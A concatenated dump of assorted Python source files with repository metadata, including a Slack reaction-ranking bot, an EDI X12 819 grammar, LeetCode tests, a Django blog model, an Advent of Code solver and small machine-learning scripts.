        # No default job for this situation (implicitly returns None).
        pass
    @property
    def juice_keg(self):
        """Resolve the juice keg object, caching its id once found.

        Falls back to scanning tagged objects owned by the keg bearer when
        the cached id is missing or stale.
        """
        object_manager = services.object_manager()
        juice_keg = None
        if self._juice_keg_object_id is not None:
            juice_keg = object_manager.get(self._juice_keg_object_id)
        if juice_keg is None:
            if self.juice_keg_bearer is not None:
                for obj in object_manager.get_objects_with_tag_gen(self.juice_keg_tag):
                    # NOTE(review): identity (`is`) comparison between two ids;
                    # `==` would be safer unless both are guaranteed the same object.
                    if obj.get_sim_owner_id() is self.juice_keg_bearer.id:
                        juice_keg = obj
                        self._juice_keg_object_id = juice_keg.id
                        break
        return juice_keg
    @property
    def juice_keg_bearer(self):
        # First (and only expected) sim holding the keg-bearer job, or None.
        sim = next(self.all_sims_in_job_gen(self.juice_keg_bearer_job_and_role.job), None)
        return sim
lock_instance_tunables(UniversityMixerPartySituation, exclusivity=(BouncerExclusivityCategory.NORMAL),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE)) | [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
291145b4c5ed899fc48d811be2dd62caa2b32b4a | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/4010/819004010.py | 23f27f88966ad294e1ec85c55e27af7395e422d6 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,730 | py | from bots.botsconfig import *
from records004010 import recorddefs
# Envelope syntax: ISA version and functional group for this message type.
syntax = {
    'version' : '00403', #version of ISA to send
    'functionalgroup' : 'JB',
    }

# Segment tree for the X12 819 transaction set (version 004010):
# ID = segment tag, MIN/MAX = occurrence bounds, LEVEL = nested child segments.
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
    {ID: 'BOS', MIN: 1, MAX: 1},
    {ID: 'CUR', MIN: 0, MAX: 1},
    {ID: 'ITD', MIN: 0, MAX: 5},
    {ID: 'N1', MIN: 0, MAX: 10, LEVEL: [
        {ID: 'N2', MIN: 0, MAX: 2},
        {ID: 'N3', MIN: 0, MAX: 2},
        {ID: 'N4', MIN: 0, MAX: 1},
        {ID: 'REF', MIN: 0, MAX: 12},
        {ID: 'MSG', MIN: 0, MAX: 12},
        {ID: 'PER', MIN: 0, MAX: 3},
    ]},
    {ID: 'JIL', MIN: 1, MAX: 10000, LEVEL: [
        {ID: 'PID', MIN: 0, MAX: 99999},
        {ID: 'REF', MIN: 0, MAX: 12},
        {ID: 'MSG', MIN: 0, MAX: 12},
        {ID: 'MEA', MIN: 0, MAX: 10},
        {ID: 'ITA', MIN: 0, MAX: 10},
        {ID: 'PSA', MIN: 0, MAX: 1},
        {ID: 'DTM', MIN: 0, MAX: 1},
        {ID: 'JID', MIN: 0, MAX: 1000, LEVEL: [
            {ID: 'PID', MIN: 0, MAX: 99999},
            {ID: 'DTM', MIN: 0, MAX: 10},
            {ID: 'REF', MIN: 0, MAX: 12},
            {ID: 'MSG', MIN: 0, MAX: 12},
            {ID: 'MEA', MIN: 0, MAX: 5},
        ]},
    ]},
    {ID: 'AMT', MIN: 1, MAX: 1},
    {ID: 'QTY', MIN: 0, MAX: 5},
    {ID: 'TDS', MIN: 0, MAX: 1},
    {ID: 'PSA', MIN: 0, MAX: 1000, LEVEL: [
        {ID: 'N1', MIN: 0, MAX: 1},
        {ID: 'N2', MIN: 0, MAX: 2},
        {ID: 'N3', MIN: 0, MAX: 2},
        {ID: 'N4', MIN: 0, MAX: 1},
        {ID: 'DTM', MIN: 0, MAX: 1},
        {ID: 'REF', MIN: 0, MAX: 12},
        {ID: 'PER', MIN: 0, MAX: 3},
    ]},
    {ID: 'CTT', MIN: 1, MAX: 1},
    {ID: 'SE', MIN: 1, MAX: 1},
    ]}
]
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
55c13d8cf177119f3b0b4ac0b18bc121cc4f8d62 | f64e31cb76909a6f7fb592ad623e0a94deec25ae | /tests/test_p1494_parallel_courses_ii.py | dbf8cbae087e98cebaed176c651d916aaa595833 | [] | no_license | weak-head/leetcode | 365d635cb985e1d154985188f6728c18cab1f877 | 9a20e1835652f5e6c33ef5c238f622e81f84ca26 | refs/heads/main | 2023-05-11T14:19:58.205709 | 2023-05-05T20:57:13 | 2023-05-05T20:57:13 | 172,853,059 | 0 | 1 | null | 2022-12-09T05:22:32 | 2019-02-27T05:58:54 | Python | UTF-8 | Python | false | false | 1,391 | py | # flake8: noqa: F403, F405
import pytest
from leetcode.p1494_parallel_courses_ii import *
solutions = [
minNumberOfSemesters,
]
test_cases = [
(
[
13,
[
[12, 8],
[2, 4],
[3, 7],
[6, 8],
[11, 8],
[9, 4],
[9, 7],
[12, 4],
[11, 4],
[6, 4],
[1, 4],
[10, 7],
[10, 4],
[1, 7],
[1, 8],
[2, 7],
[8, 4],
[10, 8],
[12, 7],
[5, 4],
[3, 4],
[11, 7],
[7, 4],
[13, 4],
[9, 8],
[13, 8],
],
9,
],
3,
),
([4, [[2, 1], [3, 1], [1, 4]], 2], 3),
([5, [[2, 1], [3, 1], [4, 1], [1, 5]], 2], 4),
([11, [], 2], 6),
([11, [], 1], 11),
([11, [], 3], 4),
([11, [], 6], 2),
([11, [], 8], 2),
([11, [], 10], 2),
([11, [], 11], 1),
([11, [], 12], 1),
]
@pytest.mark.timeout(2)
@pytest.mark.parametrize(("args", "expectation"), test_cases)
@pytest.mark.parametrize("solution", solutions)
def test_solution(args, expectation, solution):
    # Every (solution, test case) pair must finish within 2s and match.
    assert solution(*args) == expectation
| [
"zinchenko@live.com"
] | zinchenko@live.com |
b341b840a33dfd2e49d09afbc302f4239a84611c | b983d66bb053966d46b7ff0cc7bea4142d8fe852 | /src/states.py | ca19928ba363470c4fd331d5e211ff3a03e33dbe | [
"MIT"
] | permissive | povle/vk-engineers | d4104c39c1846bc5b4250702b0da486bc8e01645 | bff0c3ac244dffc79baeed423db5a5dc814f04b8 | refs/heads/master | 2023-07-28T06:52:36.184954 | 2021-09-07T21:15:44 | 2021-09-07T21:15:44 | 305,855,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | class StateError(Exception):
pass
# State identifiers for the bot's dialogue state machine.
# User-side states:
USER_NEW = 'user_new'
USER_INIT = 'user_init'
USER_DEFAULT = 'user_default'
# Admin-side states:
ADMIN_DEFAULT = 'admin_default'
ADMIN_BROADCAST_GROUP_SELECTION = 'admin_broadcast_group_selection'
ADMIN_MESSAGE_INPUT = 'admin_message_input'
ADMIN_RECEIVER_GROUP_SELECTION = 'admin_receiver_group_selection'
ADMIN_RECEIVER_SELECTION = 'admin_receiver_selection'
ADMIN_UNREAD_GROUP_SELECTION = 'admin_unread_group_selection'
| [
"pasha@blinov.co"
] | pasha@blinov.co |
172e416bfd9fae185c8298b4930fcd1fbb386ef6 | 8625b3616fa4a8aaf836c26e344bb39552a13c7b | /plugins/reactionCounterPlugin.py | 475ba07ec02c9f2bc78e4c15fc71888a5890a772 | [
"MIT"
] | permissive | Avishek-Paul/SlackAssistant | 06fa2049676206833aa661487d10518c03ea9466 | 4cb41fe62526dc26381c6ca6bc420b1104a8da2f | refs/heads/master | 2023-01-08T08:41:43.910145 | 2020-11-11T01:10:05 | 2020-11-11T01:10:05 | 311,824,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,564 | py | import config
from slackclient import SlackClient
class reactionCounterPlugin:
    """Slack plugin: tracks per-user reaction counts in MongoDB and answers
    "!rankings N"-style queries with the top givers and receivers."""

    def __init__(self):
        # Messages containing any of these keywords route to this plugin.
        self.keywords = ['!rankings', '!Rankings', '!ranking', '!Ranking', 'reactionBased']
        self.client = SlackClient(config.bot_token)
        self.db = config.mongoClient

    def execute(self, event):
        """Handle a Slack event: ranking queries and reaction add/remove."""
        if event['type'] == 'message':
            message = event.get("text", "")
            if len(message.split()) > 1:
                # "!rankings N" -- list the top N givers and receivers.
                # NOTE(review): int() on the second token raises ValueError
                # for non-numeric input -- confirm upstream filtering.
                num = int(message.split()[1])
                maxGiversRaw = self.db.find(sort=[('given', -1)])
                maxReceiversRaw = self.db.find(sort=[('received', -1)])
                mGBase = "The #{} reactor is <@{}> with {} reacts given.\n"
                mRBase = "The #{} reacted is <@{}> with {} reacts received.\n"
                m1 = ""
                m2 = ""
                for i in range(num):
                    try:
                        gItem = maxGiversRaw[i]
                        rItem = maxReceiversRaw[i]
                        m1 += mGBase.format(i+1, gItem['user_id'], gItem['given'])
                        m2 += mRBase.format(i+1, rItem['user_id'], rItem['received'])
                    except:
                        # Fewer than N users recorded -- stop early.
                        break
            else:
                # Bare keyword -- just the single top giver and receiver.
                maxGiverRaw = self.db.find_one(sort=[('given', -1)])
                maxReceiverRaw = self.db.find_one(sort=[('received', -1)])
                m1 = "The #1 reactor is <@{}> with {} reacts given.\n".format(maxGiverRaw['user_id'], maxGiverRaw['given'])
                m2 = "The #1 reacted is <@{}> with {} reacts received.\n".format(maxReceiverRaw['user_id'], maxReceiverRaw['received'])
            # Post both rankings as code blocks in the originating thread.
            self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m1))
            self.client.api_call("chat.postMessage", thread_ts=event['ts'], channel=event['channel'], text="```{}```".format(m2))
        elif event['type'] == 'reaction_added': #or event['type'] == 'reaction_removed':
            self.updateCounter(event, 1)
        elif event['type'] == 'reaction_removed':
            self.updateCounter(event, -1)

    def updateCounter(self, event, val):
        """Adjust given/received counters by `val` (+1 on add, -1 on remove)."""
        reaction = event['reaction']
        channel = event['item']['channel']
        reactor = event['user'] #react giver
        reacted = event['item_user'] #react receiver
        if reactor == reacted:
            # Self-reactions don't count.
            return
        # Refresh display/real names from the Slack API on every update.
        reactorRaw = self.client.api_call("users.info", user=reactor)
        reactedRaw = self.client.api_call("users.info", user=reacted)
        reactorReal = reactorRaw['user']['real_name']
        reactorDisplay = reactorRaw['user']['profile']['display_name']
        reactedReal = reactedRaw['user']['real_name']
        reactedDisplay = reactedRaw['user']['profile']['display_name']
        #increment the reactor
        self.db.update_one({'user_id' : reactor},
            {
                '$set' : {'display' : reactorDisplay, 'real': reactorReal},
                '$inc' : {'given' : val}
            },
            upsert=True)
        #increments the reacted
        self.db.update_one({'user_id' : reacted},
            {
                '$set' : {'display' : reactedDisplay, 'real': reactedReal},
                '$inc' : {'received' : val}
            },
            upsert=True)
"avishek97paul@gmail.com"
] | avishek97paul@gmail.com |
9e783b4e701f26b5c214da0138af22e4c3c66562 | f2ac9260dfa7483cd54a30700bb952e10acbc1bb | /fit_lr.py | 27c2ea1089ad19bf4212c6e4d9de0bab81cb012f | [] | no_license | kudkudak/compound-activity-prediction | 94dd9efd2ff7ba5c95ebb71ce1766eb6b8882aac | d55e6ecb4e3de74d40b1a37950449f60df1a2ca4 | refs/heads/master | 2016-09-15T21:35:54.930142 | 2015-01-14T13:09:19 | 2015-01-14T13:09:19 | 27,130,096 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,056 | py | from misc.utils import *
from misc.experiment_utils import get_exp_options, print_exp_header, \
save_exp, get_exp_logger, generate_configs, print_exp_name
from data_api import prepare_experiment_data, prepare_experiment_data_embedded, get_raw_training_data
from sklearn.metrics import matthews_corrcoef, accuracy_score, confusion_matrix
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import MinMaxScaler
import sklearn.linear_model
def fit_lrs(config_in = None):
#### Load config and data ####
config = {"protein":0, "fingerprint":4,"n_folds":10,
"use_embedding": 1, "K":20, "max_hashes":1000, "seed":0, "C_min":-3, "C_max":7}
if config_in is None:
config.update(get_exp_options(config))
else:
config.update(config_in)
D, config_from_data = prepare_experiment_data_embedded(n_folds=10, seed=config["seed"], K=config["K"], \
max_hashes=config["max_hashes"],
protein=config["protein"], fingerprint=config["fingerprint"])
config.update(config_from_data)
config["C"] = [10.0**(i/float(2)) for i in range(2*config["C_min"],2*(1+config["C_max"]))]
print config["C"]
logger = get_exp_logger(config)
### Prepare experiment ###
E = {"config": config, "experiments":[]}
def fit_lr(config):
### Prepare result holders ###b
values = {}
results = {}
monitors = {}
E = {"config": config, "results": results, "monitors":monitors, "values":values}
### Print experiment header ###
print_exp_name(config)
### Train ###
monitors["acc_fold"] = []
monitors["mcc_fold"] = []
monitors["wac_fold"] = []
monitors["cm"] = [] # confusion matrix
monitors["clf"] = []
monitors["train_time"] = []
monitors["test_time"] = []
results["mean_acc"] = 0
results["mean_mcc"] = 0
values["transformers"] = []
for fold in D["folds"]:
X_train, Y_train, X_test, Y_test = fold["X_train"], fold["Y_train"], fold["X_test"], fold["Y_test"]
min_max_scaler = MinMaxScaler()
X_train = min_max_scaler.fit_transform(X_train)
X_test = min_max_scaler.transform(X_test)
clf =sklearn.linear_model.LogisticRegression (C=config["C"], class_weight="auto")
tstart = time.time()
monitors["train_time"].append(time.time() - tstart)
clf.fit(X_train.astype(float), Y_train.astype(float).reshape(-1))
tstart = time.time()
Y_pred = clf.predict(X_test.astype(float))
monitors["test_time"].append(time.time() - tstart)
acc_fold, mcc_fold = accuracy_score(Y_test, Y_pred), matthews_corrcoef(Y_test, Y_pred)
cm = confusion_matrix(Y_test, Y_pred)
tp, fn, fp, tn = cm[1,1], cm[1,0], cm[0,1], cm[0,0]
monitors["clf"].append(clf)
monitors["cm"].append(cm)
monitors["wac_fold"].append(0.5*tp/float(tp+fn) + 0.5*tn/float(tn+fp))
monitors["acc_fold"].append(acc_fold)
monitors["mcc_fold"].append(mcc_fold)
monitors["acc_fold"] = np.array(monitors["acc_fold"])
monitors["mcc_fold"] = np.array(monitors["mcc_fold"])
monitors["wac_fold"] = np.array(monitors["wac_fold"])
results["mean_acc"] = monitors["acc_fold"].mean()
results["mean_mcc"] = monitors["mcc_fold"].mean()
results["mean_wac"] = monitors["wac_fold"].mean()
logger.info(results)
return E
cv_configs = generate_configs(config, ["C"])
for c in cv_configs:
print c
E["experiments"].append(fit_lr(c))
save_exp(E)
best_e = E["experiments"][0]
for e in E["experiments"]:
if e["results"]["mean_wac"] > best_e["results"]["mean_wac"]:
best_e = e
logger.info(best_e)
logger.info("Done")
if __name__ == "__main__":
fit_lrs()
| [
"staszek.jastrzebski@gmail.com"
] | staszek.jastrzebski@gmail.com |
9f0e3f8373e8127285738a76f06d09c19699634c | 7a3dec909e1a36622c66a743968a631644a1e830 | /src/uploaders/tests/test_xml_uploader.py | 2609bba6e75a537948f5c989832786ccf1820c27 | [
"MIT"
] | permissive | fares-data-build-tool/fdbt-reference-data-service | c8388e2f7912e3ef678968efb876935d3aa438e3 | d60506edf24c723a7d56a7ff7b6586f1c1e9989d | refs/heads/develop | 2021-07-19T13:26:33.707021 | 2021-04-22T15:10:02 | 2021-04-22T15:10:02 | 247,682,844 | 2 | 0 | MIT | 2021-04-28T10:56:41 | 2020-03-16T11:16:35 | Python | UTF-8 | Python | false | false | 3,533 | py | import os
from unittest.mock import patch, MagicMock
import boto3
from txc_uploader.txc_processor import download_from_s3_and_write_to_db, extract_data_for_txc_operator_service_table, collect_journey_pattern_section_refs_and_info, collect_journey_patterns, iterate_through_journey_patterns_and_run_insert_queries
from tests.helpers import test_xml_helpers
from tests.helpers.test_data import test_data
mock_data_dict = test_xml_helpers.generate_mock_data_dict()
class TestDatabaseInsertQuerying:
    """Checks that the DB insert helpers fire once per journey pattern."""

    @patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_link_table')
    @patch('txc_uploader.txc_processor.insert_into_txc_journey_pattern_table')
    def test_insert_methods_are_called_correct_number_of_times(self, mock_jp_insert, mock_jpl_insert):
        service = mock_data_dict['TransXChange']['Services']['Service']
        mock_journey_patterns = collect_journey_patterns(
            mock_data_dict, service)
        # Fake row ids returned by the mocked journey-pattern insert.
        mock_jp_insert.side_effect = [
            9, 27, 13, 1, 11, 5, 28, 12, 10, 6, 13, 27, 4]
        mock_cursor = MagicMock()
        mock_op_service_id = 12
        iterate_through_journey_patterns_and_run_insert_queries(
            mock_cursor, mock_data_dict, mock_op_service_id, service)
        # One insert of each kind per collected journey pattern.
        assert mock_jp_insert.call_count == len(mock_journey_patterns)
        assert mock_jpl_insert.call_count == len(mock_journey_patterns)
def test_extract_data_for_txc_operator_service_table(self):
expected_operator_and_service_info = (
'ANWE', '2018-01-28', 'ANW', 'Macclesfield - Upton Priory Circular', 'NW_01_ANW_4_1', 'Macclesfield', 'Macclesfield')
operator = mock_data_dict['TransXChange']['Operators']['Operator']
service = mock_data_dict['TransXChange']['Services']['Service']
assert extract_data_for_txc_operator_service_table(
operator, service) == expected_operator_and_service_info
def test_collect_journey_pattern_section_refs_and_info(self):
mock_raw_journey_patterns = mock_data_dict['TransXChange'][
'Services']['Service']['StandardService']['JourneyPattern']
assert collect_journey_pattern_section_refs_and_info(
mock_raw_journey_patterns) == test_data.expected_list_of_journey_pattern_section_refs
def test_collect_journey_patterns(self):
service = mock_data_dict['TransXChange']['Services']['Service']
assert collect_journey_patterns(
mock_data_dict, service) == test_data.expected_list_of_journey_patterns
class TestMainFunctionality:
    """End-to-end: S3 download feeding the (mocked) database writer."""

    @patch('txc_uploader.txc_processor.write_to_database')
    def test_integration_between_s3_download_and_database_write_functionality(self, db_patch, s3, cloudwatch):
        # `s3` and `cloudwatch` are fixtures (presumably moto-style fakes
        # defined in conftest.py -- not visible here).
        dir_path = os.path.dirname(os.path.realpath(__file__))
        mock_file_dir = dir_path + '/helpers/test_data/mock_txc.xml'
        mock_bucket = 'test-bucket'
        mock_key = 'tnds/WM/test-key'
        db_connection = MagicMock()
        logger = MagicMock()
        conn = boto3.resource('s3', region_name='eu-west-2')
        # pylint: disable=no-member
        conn.create_bucket(Bucket=mock_bucket)
        s3.put_object(Bucket=mock_bucket, Key=mock_key,
                      Body=open(mock_file_dir, 'rb'))
        download_from_s3_and_write_to_db(
            s3, cloudwatch, mock_bucket, mock_key, mock_file_dir, db_connection, logger)
        # Region 'WM' and source 'tnds' must be parsed from the key path.
        db_patch.assert_called_once_with(
            mock_data_dict, 'WM', 'tnds', mock_key, db_connection, logger, cloudwatch)
| [
"noreply@github.com"
] | noreply@github.com |
364d6a8b4e45dedb56ee9f02ada48d814d3f2292 | 4ccc8d6e163b156e06a5c107a6a28681184a8a03 | /2021/day_05.py | 7f2b6f57581f3a8cc0b6db5b969eb1f474bb5c19 | [] | no_license | mmercedes/adventofcode | 798925a2b8403948c16d68b9e195c148d0a69b8a | 306cffadafb48863277295cf9ed56e95699d92e6 | refs/heads/master | 2022-01-01T09:25:38.974142 | 2021-12-14T18:33:07 | 2021-12-14T18:33:07 | 159,980,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | #!/usr/bin/env python
import re
def lookup_insert(m, x, y):
    """Increment the hit count for point (x, y) in the nested-dict grid m."""
    row = m.setdefault(x, {})
    row[y] = row.get(y, 0) + 1
def insert_line(m, x1, y1, x2, y2):
    """Mark every lattice point on the segment (x1,y1)->(x2,y2) in grid m.

    Assumes horizontal, vertical, or 45-degree lines (the puzzle input
    guarantee); for other slopes the independent per-axis stepping below
    would trace a bent path -- confirm inputs if reused elsewhere.
    """
    dx = 1 if (x1 < x2) else -1
    dy = 1 if (y1 < y2) else -1
    i, j = (x1, y1)
    # The loop below stops before recording the endpoint, so count it here.
    lookup_insert(m, x2, y2)
    while ((i != x2) or (j != y2)):
        lookup_insert(m, i, j)
        if (i != x2): i += dx
        if (j != y2): j += dy
def day5():
    """Advent of Code 2021 day 5: count grid points covered by 2+ vent lines.

    Part 1 counts only horizontal/vertical lines; part 2 adds diagonals.
    """
    p1_lookup = {}
    p2_lookup = {}
    with open("./inputs/input_05.txt") as f:
        for line in f:
            # Each input line looks like "x1,y1 -> x2,y2".
            m = re.match(r"(?P<x1>[0-9]+),(?P<y1>[0-9]+) -> (?P<x2>[0-9]+),(?P<y2>[0-9]+)", line).groupdict()
            x1, y1, x2, y2 = (int(m['x1']), int(m['y1']), int(m['x2']), int(m['y2']))
            if (x1 == x2) or (y1 == y2):
                # Axis-aligned lines count for part 1.
                insert_line(p1_lookup, x1, y1, x2, y2)
            # Every line (including diagonals) counts for part 2.
            insert_line(p2_lookup, x1, y1, x2, y2)
    # Count points covered by at least two lines.
    p1_ans = 0
    for x in p1_lookup:
        for y in p1_lookup[x]:
            if p1_lookup[x][y] > 1:
                p1_ans += 1
    p2_ans = 0
    for x in p2_lookup:
        for y in p2_lookup[x]:
            if p2_lookup[x][y] > 1:
                p2_ans += 1
    print("p1 ans: %i" % p1_ans)
    print("p2 ans: %i" % p2_ans)


day5()
| [
"matthewmercedes@gmail.com"
] | matthewmercedes@gmail.com |
97e53dbcc10f19ff3e71ee359e01ac2874a34773 | 0bdcbad65988ffa36a20e46228e39a55c5af3c47 | /src/get_files_not_in.py | b6c62ef31ce35ecaa9667b9b879ab6fc4b123093 | [
"MIT"
] | permissive | mpaloni/pioneer | abdc2d38eb79759aa2d9d5df6cc63c823ba74101 | c49efa2e071307b2534ca2abe7560f57683d2d9e | refs/heads/master | 2020-04-19T02:46:43.360350 | 2019-01-28T07:07:40 | 2019-01-28T07:07:40 | 167,914,384 | 0 | 0 | MIT | 2019-01-28T07:00:52 | 2019-01-28T07:00:51 | null | UTF-8 | Python | false | false | 1,637 | py |
import os
import argparse
import csv
import shutil
def main():
    """Copy every celebA image NOT listed in glasses.csv to the target
    directory, i.e. build the 'no glasses' subset.

    Improvements over the original: the glasses file names are stored in a
    set (the per-file `in` test was O(n) against a list -- quadratic over
    ~200k celebA images), the source directory is listed once instead of
    twice, and the dead commented-out argparse block is removed.
    """
    print("Started")
    csv_path = os.path.expanduser("~/dippa/glasses.csv")
    source = os.path.expanduser("~/dippa/img_align_celeba")
    target = os.path.expanduser("~/dippa/celeba_noglasses/img")

    # Collect the file names of images that have glasses.
    glasses = set()
    with open(csv_path, 'r') as csvfile:
        reader = csv.reader(csvfile, delimiter=',', quotechar='|')
        for row in reader:
            # Same normalisation as before: join cells, strip double quotes.
            glasses.add(', '.join(row).replace('"', ''))

    for file_name in os.listdir(source):
        if file_name not in glasses:
            full_file_name = os.path.join(source, file_name)
            print("Shifting " + file_name + " to " + target)
            shutil.copy(full_file_name, target)


main()
| [
"noreply@github.com"
] | noreply@github.com |
3e2e4ac2bfe11f943d6d864dc62bf236447cab5b | b8800f65c2955768b58c7d7fbd89647a644daed6 | /blog/models.py | b1d723e885fb9838448eac3c9471705c1f03e512 | [] | no_license | revianblue/my-first-blog | 791ae3db3f788a337c3db0986f11930eeff77e26 | a06af2e7f344e2e54be0ff677bfe403a721fea7e | refs/heads/master | 2021-01-20T01:04:46.380012 | 2017-04-24T13:38:10 | 2017-04-24T13:38:10 | 89,220,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | from django.db import models
from django.utils import timezone
class Post(models.Model):
    """A blog post (Turkish field names: yazar=author, baslik=title,
    yazi=body, yaratilma_tarihi=created, yayinlanma_tarihi=published).

    NOTE(review): ForeignKey without on_delete implies a pre-2.0 Django;
    left as-is to avoid changing the migration surface.
    """
    yazar = models.ForeignKey('auth.User')
    baslik = models.CharField(max_length=200)
    yazi = models.TextField()
    yaratilma_tarihi = models.DateTimeField(default=timezone.now)
    yayinlanma_tarihi = models.DateTimeField(blank=True, null=True)

    def yayinla(self):
        """Publish the post: stamp the publication time and persist it."""
        self.yayinlanma_tarihi = timezone.now()
        # BUG FIX: the original referenced the bound method (self.save)
        # without calling it, so the publish timestamp was never saved.
        self.save()

    def __str__(self):
        return self.baslik
| [
"araserbilgin@gmail.com"
] | araserbilgin@gmail.com |
e19eeb31f0acad784dc3dad13eaa2bef568c94a5 | ed72d3f672d3298e9a2a4e9ff31915f9275bbf46 | /flight.py | a1043999b4044de661e6b6935f51b0bc6b746643 | [] | no_license | KirtMorgan/model_airport | 93810ceffce89ab670be7e10d1e0d44b7505e04e | e640a78e6afccb10f5f15646c696afd22027756a | refs/heads/master | 2020-05-17T00:03:51.525043 | 2019-04-29T14:30:19 | 2019-04-29T14:30:19 | 183,386,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,177 | py | from passenger import *
from plane import *
class Flight:
    """One flight: a route string, an assigned plane, and the list of
    booked passengers."""
    def __init__(self, origin_destination='', plane=''):
        self.origin_destination = origin_destination
        self.plane = plane
        # Passengers are appended via add_passenger(); starts empty.
        self.passengers_list = []
    def add_plane(self, plane):
        """Assign (or replace) the plane serving this flight."""
        self.plane = plane
    def add_origin_destination(self, origin_destination):
        """Assign (or replace) the route description string."""
        self.origin_destination = origin_destination
    def add_passenger(self, passenger):
        """Book one more passenger onto this flight."""
        self.passengers_list.append(passenger)
# Airlines
# Sample flights wired to planes from plane.py; each Boeing_* object's
# .owner attribute is defined there (presumably the operating airline —
# not visible in this module).
airline_1 = Flight('UK - New Vegas', Boeing_747_8.owner)
airline_2 = Flight('Turkey - Paris', Boeing_747_400.owner)
airline_3 = Flight('New York - UK', Boeing_747_400ER.owner)
airline_4 = Flight('Spain - Portugal', Boeing_777_300.owner)
airline_5 = Flight('France - Germany', Boeing_777_300ER.owner)
# Registry of the demo flights above.
list_flights = []
list_flights.append(airline_1)
list_flights.append(airline_2)
list_flights.append(airline_3)
list_flights.append(airline_4)
list_flights.append(airline_5)
# Registry of the demo passengers imported from passenger.py.
list_passengers = []
list_passengers.append(passenger_1)
list_passengers.append(passenger_2)
list_passengers.append(passenger_3)
list_passengers.append(passenger_4)
list_passengers.append(passenger_5)
"kirtmorgan@live.com"
] | kirtmorgan@live.com |
78e368fb716111fadb4e8ba88e1ddd8e34f363a5 | 98b0d740346ad9aecd228b9a8ebb8e818908ce03 | /hr-1.py | 0d51517045973153f9d6f31c16975b8fb25a1e6b | [] | no_license | alexisbellido/python-examples | 8c63156a2800a584a8aff0909325e38acbe49163 | e6a4f61d9cd18588987430007e28ef036971764b | refs/heads/master | 2022-10-16T08:28:15.312916 | 2022-09-30T15:55:31 | 2022-09-30T15:55:31 | 240,379,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def hi(name):
return f'Hi, {name}'
if __name__ == '__main__':
    # people = [input().split() for i in range(int(input()))]
    # print(*name_format(people), sep='\n')
    ####################
    # NOTE(review): every call below is commented out, so running this
    # script currently produces no output.
    people = [
        'John',
        'Mike',
    ]
    # print(hi(people[0]))
    # print(hi(people[1]))
    # print(*hi(people), sep='\n')
| [
"alexis@ventanazul.com"
] | alexis@ventanazul.com |
d3c0c2a4b226f7e7de023845098715c9f079029c | 6484cdf98189f5f5736950c81a9d8d30e0f0c0db | /notifications/serializers.py | 488db18520ad943f4fc0b50ec121588e37fe25bd | [] | no_license | AlexFrundin/great_app_example | e0e9c91f06bfba76058f3af5b113a9399945bf6c | 23225e7e88f2ee51359d23cac2200b32b8bd6e20 | refs/heads/main | 2023-05-30T15:02:22.035811 | 2021-06-17T06:40:06 | 2021-06-17T06:40:06 | 339,434,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | from rest_framework import serializers
from .models import Notification
# Serializes Notification rows for list endpoints; created_on is rendered
# as e.g. "05 Mar 2021" via the explicit DateTimeField format.
# NOTE(review): the class name misspells "Notification"; left unchanged
# because importers reference it by this exact name.
class NoitifcationListSerializer(serializers.ModelSerializer):
    created_on = serializers.DateTimeField(format="%d %b %Y")
    class Meta:
        model = Notification
        fields = (
            'id',
            'refrence_id',
            'event_id',
            'title',
            'message',
            'is_read',
            'is_deleted',
            'created_on')
| [
"aleksey.frundin@gmail.com"
] | aleksey.frundin@gmail.com |
8d00b1ee6bc068f204efbd23dc93e6b7be30deb3 | 36c170d204310f4e5985bd5c024a286acae36aba | /Labs/seminar/functii.py | 930df547edf5d8709c42ecbf513a6d063922f248 | [] | no_license | petrediana/Analiza-Datelor | 7cc6d1f31f6d7407e702d2cc29b9baa7ca1cda8c | 23d2282a0a662fe778aae5ec9d90e32c353bdec0 | refs/heads/master | 2020-08-04T05:52:36.700366 | 2019-12-10T08:20:54 | 2019-12-10T08:20:54 | 212,029,364 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | import numpy as np
import pandas as pd
# Takes the hierarchy (linkage) matrix and the number of clusters to cut into
def partitie(h, k):
    """Cut a hierarchical-clustering linkage matrix *h* into *k* clusters.

    Replays the first n-k merges: the n observations start as singleton
    clusters 0..n-1 and merge step i fuses clusters h[i, 0] and h[i, 1]
    into a new cluster labelled n+i. The surviving labels are recoded to
    categorical codes and returned as the strings "c1".."ck".
    """
    n = h.shape[0] + 1            # number of observations
    labels = np.arange(n)         # current cluster id per observation
    for step in range(n - k):
        merged_a = h[step, 0]
        merged_b = h[step, 1]
        new_id = n + step
        labels[labels == merged_a] = new_id
        labels[labels == merged_b] = new_id
    codes = pd.Categorical(labels).codes
    return ["c%d" % (code + 1) for code in codes]
"noreply@github.com"
] | noreply@github.com |
